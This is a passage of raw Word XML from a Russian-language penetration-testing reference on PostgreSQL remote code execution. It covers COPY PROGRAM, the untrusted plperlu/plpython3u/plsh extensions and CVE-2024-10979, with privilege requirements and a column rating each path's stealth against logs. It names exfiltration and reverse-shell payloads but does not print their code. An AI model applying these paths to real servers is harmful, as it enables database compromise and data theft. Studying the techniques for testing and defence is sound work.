        <w:t xml:space="preserve"> в plsh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259566E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   Те же OS-сигналы, что в 3.7.1 / 3.7.2a: аномальный исходящий трафик, audited execve от postgres-UID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855A7A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.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114864D9"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90DAEE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Расширение</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CFA8EDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версия PG</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3474C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Поведение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0E0090C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519800" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plpython3u</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40F032" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 11+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4B90D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>стабильное, untrusted by design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4BFA70E4"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EE1C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plpythonu (Python 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E7A38C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>до PG 11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7A040F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>deprecated, удалён из contrib в PG 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="64DB954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C9B291" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plsh</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D4596B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все current PG</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771133" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>стабильное (внешний пакет)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2105DA9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FA0CF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plr</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D079EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все current PG</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E2989F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>стабильное (внешний пакет, untrusted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="176FCBE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9F89A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plv8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6FB6DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все current PG</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C6F9F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">стабильное (внешний пакет, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>trusted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — для атак сложнее)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36EF051C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3DDFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива, требует pg_execute_server_program (более доступно), не требует CREATE EXTENSION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87EC14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой untrusted-язык с теми же требованиями (superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878ABCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный путь без superuser (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plperl).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863F74C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пути получения superuser. Без него все три untrusted-extension недоступны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12E2F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг для протаскивания CREATE FUNCTION + SELECT в одной инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35992A91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002CF9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/Python — Python Procedural Language» — https://www.postgresql.org/docs/current/plpython.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3E387" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/Python — Sharing Data» (untrusted nature) — https://www.postgresql.org/docs/current/plpython-sharing.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C6093" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   plsh GitHub: github.com/petere/plsh — https://github.com/petere/plsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D31B985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   plr GitHub: github.com/postgres-plr/plr — https://github.com/postgres-plr/plr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A72685" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   plv8 GitHub: github.com/plv8/plv8 — https://github.com/plv8/plv8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D71E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   HackTricks: «PostgreSQL injection» (раздел RCE через extension languages) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31870CCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Rapid7 Metasploit: модули для plpython3u RCE — https://www.rapid7.com/db/?q=postgres+python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502C733" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R7 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0C83D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112ECEC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.7 разобраны четыре пути к Remote Code Execution в PostgreSQL: серверная фича </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, две формы untrusted procedural languages (plperlu, plpython3u/plsh), и одиночный CVE в trusted plperl. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE здесь — финальная стадия после получения SQL-execution с подходящей привилегией</w:t>
      </w:r>
      <w:r>
        <w:t>. Сам механизм исполнения OS-команд — либо документированная фича PostgreSQL (COPY PROGRAM), либо штатная функциональность untrusted-расширений; CVE-2024-10979 — единственное исключение, реальный sandbox-escape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBED965" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самый прямой путь. Три payload: one-shot exfil через TO PROGRAM, reverse-shell через FROM PROGRAM, chain с CVE-2025-1094. Требует superuser или predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 11).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6C743" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a plperlu untrusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Perl без sandbox через CREATE FUNCTION. Только superuser. system()/exec()/backtick из тела функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603751CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b CVE-2024-10979 в plperl trusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный путь без superuser. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{LD_PRELOAD}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{PATH}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через дыру в Safe-sandbox trusted plperl. Pre-condition — вредоносный файл на хосте. Уязвимо до 17.1/16.5/15.9/14.14/13.17/12.21 (фикс 14.11.2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549CDB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.3 plpython3u и plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Python и shell без sandbox. Те же требования (superuser), та же модель угроз. Plus упоминание plr (untrusted) и plv8 (trusted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B658759" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>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274"/>
        <w:gridCol w:w="2715"/>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1597"/>
        <w:gridCol w:w="1725"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="63987771" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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1063F11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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7AE51EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Путь</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58A00BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия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A4B0E00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Расширение / pre-flight</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C6510CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managed-доступность</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C42A3F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Стелс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="15BCBFEA"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2B25E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1</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5A18C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>COPY PROGRAM</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75B941" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PG 11+: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ИЛИ superuser; PG ≤10: superuser</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50AB2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>встроено (COPY)</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C4093B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на RDS/Cloud SQL/Supabase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A31080" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">низкий — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>COPY ... PROGRAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в логах</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="325CADAA"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1B3D71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2a</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10CBD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plperlu</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684B32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>superuser</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9AC6F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plperlu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Perl-runtime на хосте</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F8F9AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</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8EB258" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">средний — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE FUNCTION ... LANGUAGE plperlu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в DDL-логах</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1A826AB2"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7F287A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2b</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40A25E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10979 в plperl</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A1C605" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC (USAGE on plperl) + CREATE в любой схеме (pg_temp всегда) + уязвимая версия PG</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366770" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (trusted) + Perl-runtime; файл в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; trigger через spawn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2B0151" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>частично (Cloud SQL — да, RDS опционально); все managed обычно патчат вовремя</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DE3ACB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">высокий — невидимо в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_proc.prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> после исполнения, ENV-mutation вне DDL-логов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5892364E"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43E630" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.3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E289C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plpython3u / plsh</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C053D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>superuser</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F1B154" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plpython3u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
